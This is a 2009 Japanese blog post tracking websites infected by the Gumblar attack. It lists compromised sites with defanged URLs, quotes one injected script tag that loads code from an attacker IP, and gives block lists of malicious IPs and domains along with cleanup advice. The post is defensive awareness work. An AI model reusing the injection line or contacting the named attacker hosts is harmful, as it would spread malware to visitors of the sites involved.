The Gumblar makes forced bets magnified
******* 危険 *******
アダルトサイト以外は警報メール送信してるんだけどなぁ・・(涙) from @gmail.com
2009.05.04 AM08:00AM現在、1個も閉鎖、悪意コードの削除を行ったトコが無い・・・
照英 オフィシャル・サイト
hxxp://www。s-progress。com/talent/show-a/
Analysis report for hxxp://www_s-progress_com/talent/show-a/
2009.05.04 AM08:00 JST 現在感染中(7日目に突入)
blogスタッフが気がついたかも?
株式会社ウェルネス
hXXp://www。wellness。co。jp/
2009.05.04 AM08:00 JST 現在感染中
飛騨高山・高原のペンションで手作りのおもてなし♪【ふらいingぱん】
hXXp://p-frying・com/gaiyo.html
2009.05.04 AM08:00 JST 現在感染中
Yudai Sato 佐藤 勇大 Official Site
hXXp://sound・jp/yudai_marimba/index.html
2009.05.04 AM08:00 JST 現在感染中
岐阜市 エステサロン「ラーンジュ」
hXXp://www・esthetics-lange・com/bridalesthe.html
Analysis report for hXXp://www・esthetics-lange・com/
2009.05.04 AM08:00 JST 閉鎖から復帰後、再感染(zlkon)
※ <script src=//94・247・2・195/jquery.js></script>
株式会社 前後前
hXXp://www・zengozen・co・jp/
2009.05.04 AM08:00 JST 現在感染中
FREAK'S STORE [フリークスストア]
hXXp://www・freaksstore・com/index.html
2009.05.04 AM08:00 JST 現在感染中
Arc Design - 株式会社アークデザイン 一級建築士事務所
hXXp://www・arc-design・biz/
2009.05.04 AM08:00 JST 現在感染中
※感染してるけど、PHPのレンダリングに問題があって現状ではウィルス散布できてない模様(笑)
さらに感染サイト増加:
年齢早見表のWEBサイト版
hXXp://www・nenrei-hayami・net/
2009.05.04 AM08:00 JST 現在感染中
以下、未成年者は開かないようにネ
開くのもイヤ・・
hXXp://mt-hitoz・iivoice.com/
Analysis report for hXXp://mt-hitoz_iivoice_com/
というか、こんなページ(全面IFRAME)を何の躊躇もなく開いてしまうヒトは危険ですよ
2009.05.04 AM08:00 JST 現在感染中
開くのもイヤ Part2
hXXp://mt-koibito・iivoice・com/
2009.05.04 AM08:00 JST 現在感染中
まだまだ増えそうです・・・
----------
海外サイト
hXXp://www_signalbooks_co_uk/
hXXp://raindaff_com/
hXXp://irelandseo_com/
hXXp://www_seoaura_com/
hXXp://www_twitterwoo_co_uk/
--
大手だと、KFC(ケンタッキーフライドチキン)のパキスタンのサイトが絶賛感染中
hXXp://www_kfcpakistan_com/
Analysis report for hXXp://www_kfcpakistan_com/
hXXp://gumblar_cn/rss/?id=2 -- 200 -- application/pdf
gumblar.pdf(2/40)
2009.05.04 AM08:00 JST 現在感染中
--
Canon USA の 子会社かリセラーのサイトが感染してるかも?
hXXp://dir_gmdtexas_com/
Canon U.S.A., Inc., Vendor ID 113-256-1772-501, offers Canon printers, multifunction products and related services to Texas governmental and public educational entities at discounted prices through DIR's Go DIRect Program.
Domain Name.......... gmdtexas.com
Organisation Name.... Canon U.S.A., Inc.
Organisation Address. 2110 Washington Blvd., Suite 150
Organisation Address. UNITED STATES
2009.05.03 PM20 JST 現在感染中
******* /危険 *******
キリガナイ・・・
----------
For 一般ユーザさん
簡単な対策:
Google ToolBar入ってればブロックされます(笑)
されないケースを確認しました
FirefoxやChromeを使っていればブロックされます。
Adobe Flash Player のアップデート
Adobe Acrobat Reader のアップデート
NoScriptの導入(
Firefoxの導入も含めて)
危険IPのブロック(Firewall登録/IPベースのブロッカーの導入)
IDS/IPS/Firewall
BLOCK : 94.229.65.160 - 94.229.65.191
めんどくさいんで、まとめてブロック
BLOCK : 94.229.64.0/20 (94.229.64.0 - 94.229.79.255)
Browser/Hosts ブロック:
BLOCK : gumblar.cn
あと、zlkonも忘れずに・・
BLOCK : 94.247.2.0 - 94.247.3.255
BLOCK : zlkon.lv
-----------
For 感染しちゃったヒト:
おきのどくですがぼうけんのしょはきえてしまi
内容的にはココに書いたことと変わっていません。イチイチチェックしながら復旧するよりも、バックアップしてクリーンインストールしたほうがいいです。
PCが2台あるなら、感染していないことを確認したPCから、全てのパスワードの変更を行ってください。
絶対に感染しているPCでパスワードの変更を行わないで下さい。
----------
特に感染したサイト・バブリッシャへ
あなたが感染したウィルスはこんなにタチの悪いものです。
薬事日報のサイトが改ざん~閲覧者にウイルス感染のおそれ
正規サイト改ざん(2) 薬事日報社が調査結果公表~改ざんの手口が明らかに
対処方法は、以下のサイトの対処を見て判断してください
※大変、マジメかつ適切に対処したサイトです。
株式会社ブランジスタ
http://mag-puppine.com/osirase/index.html
WDSC -- World Death Sauce Center
http://ameblo.jp/wdsc-blog/
HOBBY COMPLEX公式webサイト
http://www.hobbycomplex.com/
株式会社 薬事日報社
http://www.yakuji.co.jp/entry_16.html
全日本民主医療機関連合会
http://www.min-iren.gr.jp/seimei-kenkai/2009/090424/090424-01.html
NHT紀尾井町グループ
http://www.nhtjapan.com/news/owabi.html
ネットバイト ※アフィサイトなので注意
http://afi2000.web.fc2.com/juuyou.html
----------
Take Care
5 月 7th, 2009 at 3:08 AM
[...] 賃貸 アパート お部屋探しの 旭総合開発 トップページ http://www.asahi-club.com/ 「まじめに対応」しているところがバカを見る結果になるので、コンプライアンス的には許したくありません [...]